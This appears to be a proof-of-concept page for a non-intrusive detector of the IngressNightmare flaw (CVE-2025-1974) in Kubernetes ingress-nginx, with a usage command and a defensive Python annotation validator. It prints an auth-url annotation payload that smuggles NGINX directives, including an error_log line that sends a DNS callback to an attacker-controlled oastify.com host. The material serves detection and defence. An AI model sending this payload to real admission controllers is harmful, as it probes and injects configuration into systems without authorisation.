
CVE-2025-1974 PoC — Kubernetes ingress-nginx security vulnerability

Source
Associated Vulnerability
Title: Kubernetes ingress-nginx security vulnerability (CVE-2025-1974)
Description: Kubernetes ingress-nginx is an ingress controller for Kubernetes, open-sourced by the Cloud Native Computing Foundation (CNCF), that uses NGINX as a reverse proxy and load balancer. Kubernetes ingress-nginx contains a security vulnerability: under certain conditions, an unauthenticated attacker with access to the pod network can execute arbitrary code in the context of the ingress-nginx controller, which may lead to the disclosure of Secrets.
Description
Proof-of-Concept Tool to detect IngressNightmare (CVE-2025-1974) via (non-intrusive) active means.
Readme
# IngressNightmare Detection Tool

## Overview

This tool provides a non-intrusive detection capability for the IngressNightmare vulnerability chain ([CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)) affecting Ingress NGINX Controller. It specifically leverages the auth-url annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to verify the presence of this critical vulnerability without executing arbitrary code.

## Technical Background

The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through various Ingress annotation fields. When these malicious Ingress resources are processed by the admission controller, the injected directives are evaluated during the NGINX configuration validation phase (`nginx -t`).

This PoC specifically exploits the `auth-url` annotation vulnerability by injecting the `error_log` directive with a syslog server pointing to an attacker-controlled domain. During configuration validation, NGINX will:

1. Parse the injected configuration
2. Resolve the specified domain via DNS

This DNS resolution activity provides a reliable signal that the target is vulnerable without requiring code execution or service disruption.

## Usage

1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.

2. Execute the detection tool:
   ```
   $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
   ```

3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain:

![poc](./poc.png)

## Detection Methodology

The tool crafts a specially formed AdmissionReview object containing an Ingress resource with the following injection payload:

```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```

This payload:
- Uses the comment character (`#`) to terminate the URL
- Injects a newline followed by a resolver directive
- Adds the `error_log` directive with syslog pointing to the DNS callback domain
- Comments out the remainder to maintain syntactic validity

When processed by a vulnerable admission controller, this results in an outbound DNS lookup that confirms the presence of the vulnerability.
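As an added, defensive illustration (this is not code from this repository or from the ingress-nginx project), the following Python function turns the payload structure described above into a validation rule: it inspects the annotations of an Ingress manifest and rejects any `auth-url` value that could break out of the URL into NGINX directive context, i.e. anything that is not a plain absolute http(s) URL free of newlines, `;`, `#`, braces, quotes and whitespace. The list of screened annotations, the function names and the rejection rules are this example's own assumptions about what a validating admission policy or a CI lint could enforce; the sample manifests are constructed, and the injected one carries the payload quoted above with its `\n` escapes decoded into real newlines, as they would be after the AdmissionReview JSON is parsed.

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: only auth-url is screened here. Any other annotation
# whose value is rendered into the generated NGINX configuration can be appended.
SCREENED_ANNOTATIONS = (
    "nginx.ingress.kubernetes.io/auth-url",
)

# Characters that are significant in NGINX configuration syntax (directive terminator,
# comment marker, block delimiters, quoting) plus any whitespace. A legitimate
# external-auth URL never needs any of them.
NGINX_BREAKOUT = re.compile(r"[\r\n;#{}\"'\\]|\s")


def audit_ingress_annotations(manifest, screened=SCREENED_ANNOTATIONS):
    """Return a list of findings for annotation values that could inject NGINX directives.

    An empty list means every screened annotation present on the object is a plain
    absolute http(s) URL. The function is pure and does no network or cluster access.
    """
    findings = []
    metadata = manifest.get("metadata", {}) or {}
    annotations = metadata.get("annotations", {}) or {}
    name = metadata.get("name", "<unnamed>")

    for key in screened:
        value = annotations.get(key)
        if value is None:
            continue
        if not isinstance(value, str):
            findings.append(f"{name}: {key} is not a string")
            continue

        # First gate: any config-significant character means the value can escape
        # the URL position in the rendered configuration. Report where it occurs.
        match = NGINX_BREAKOUT.search(value)
        if match:
            findings.append(
                f"{name}: {key} contains config-significant character "
                f"{match.group(0)!r} at offset {match.start()}"
            )
            continue

        # Second gate: what remains must still be an absolute http(s) URL with a host.
        parts = urlsplit(value)
        if parts.scheme not in ("http", "https") or not parts.netloc:
            findings.append(f"{name}: {key} is not an absolute http(s) URL: {value!r}")

    return findings


def audit_admission_review(review):
    """Apply the same audit to the object carried inside an AdmissionReview body."""
    obj = (review.get("request", {}) or {}).get("object", {}) or {}
    if obj.get("kind") != "Ingress":
        return []
    return audit_ingress_annotations(obj)


# Constructed sample: the detection payload quoted in the README above, with the
# JSON escapes decoded into real newlines as the admission controller would see them.
INJECTED_INGRESS = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "probe",
        "annotations": {
            "nginx.ingress.kubernetes.io/auth-url":
                "http://example.com/#;\n resolver 8.8.8.8;\n"
                " error_log syslog:server=unique-id.oastify.com:80 debug;\n #",
        },
    },
}

# Constructed sample: a legitimate external-auth configuration that must pass.
BENIGN_INGRESS = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "web",
        "annotations": {
            "nginx.ingress.kubernetes.io/auth-url": "https://auth.example.internal/validate",
        },
    },
}

if __name__ == "__main__":
    for manifest in (BENIGN_INGRESS, INJECTED_INGRESS):
        result = audit_ingress_annotations(manifest)
        status = "OK" if not result else "REJECT"
        print(f"{manifest['metadata']['name']}: {status}")
        for finding in result:
            print("  -", finding)
```

The check deliberately fails closed on the first config-significant character rather than trying to recognise specific directives such as `error_log` or `resolver`, so it also covers variants of the payload that use other directives. It complements, rather than replaces, upgrading the controller to a fixed release and restricting network access to the admission webhook.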

## Limitations

This tool only detects the presence of the vulnerability and does not attempt to exploit it for arbitrary code execution.

## Credits

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
File Snapshot

[4.0K] /data/pocs/6e2e313a2110bf5ccfddbd5f8d3cba307e5bfbca
├── [3.1K] detect.py
├── [1.3K] poc.json
├── [ 88K] poc.png
└── [2.5K] README.md

0 directories, 4 files